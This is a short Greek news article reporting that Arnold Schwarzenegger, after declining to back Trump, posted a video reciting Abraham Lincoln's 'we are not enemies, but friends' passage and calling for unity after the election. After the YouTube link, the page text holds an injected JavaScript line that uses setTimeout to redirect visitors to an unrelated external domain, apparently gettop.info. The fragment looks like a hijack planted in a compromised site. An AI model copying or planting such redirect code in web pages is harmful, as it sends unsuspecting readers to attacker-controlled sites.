Ο «Εξολοθρευτής» στέλνει μήνυμα στις ΗΠΑ για τον Τραμπ (ΒΙΝΤΕΟ)

0
13

 

Παρά το γεγονός οτι εξελέγη Κυβερνήτης της Καλιφόρνια σε δύο εκλογικές αναμετρήσεις το 2003 και το 2006 με τη στήριξη των Ρεπουμπλικανών, όπως είναι και ο ίδιος, ο Άρνολντ Σβαρτσενέγκερ είχε δηλώσει ότι δεν επρόκειτο να ψηφίσει τον Ντόναλντ Τραμπ καθώς δεν τον εκφράζει.

Μία ημέρα μετά, ο Εξολοθρευτής θέλησε να στείλει μήνυμα στους Αμερικανούς… με την αυστριακή του προφορά, όπως λέει σε βίντεο που ο ίδιος ανήρτησε στο youtube προκειμένου να ενώσει τους συμπατριώτες του. Απαγγέλλει ένα απόσπασμα από ομιλία του Αβραάμ Λίνκολν το οποίο όπως αναφέρει λατρεύει.

«Δεν είμαστε εχθροί, μα φίλοι. Δεν πρέπει να είμαστε εχθροί. Και αν το πάθος μπορεί να φτάσει στα όρια του, δεν πρέπει να σπάσει τους δεσμούς αγάπης. Οι μυστικές χορδές της μνήμης που εκτείνονται από κάθε πεδίο της μάχης και τάφο πατριώτη σε κάθε πάλλουσα καρδιά και κάθε εστία σε αυτή τη γη, θα φουσκώσουν όταν και πάλι αγγιχτούν, όπως σίγουρα θα γίνει, από τους καλύτερους αγγέλους της φύσης μας» απήγγειλε ο Άρνι και σημείωσε:

«Δεν είναι υπέροχο; Αγαπώ αυτό το απόσπασμα… Την ημέρα που τελειώνει η προεκλογική εκστρατεία, που τελειώνουν οι εκλογές, δεν είμαστε εχθροί, είμαστε γείτονες, είμαστε φίλοι και πάνω από όλα είμαστε όλοι Αμερικανοί και έχουμε πολλή δουλειά να κάνουμε για να παραμείνει σπουδαία η Αμερική. Ας το κάνουμε, και ας το κάνουμε μαζί».

https://www.youtube.com/watch?v=K0u_on5fQsY setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here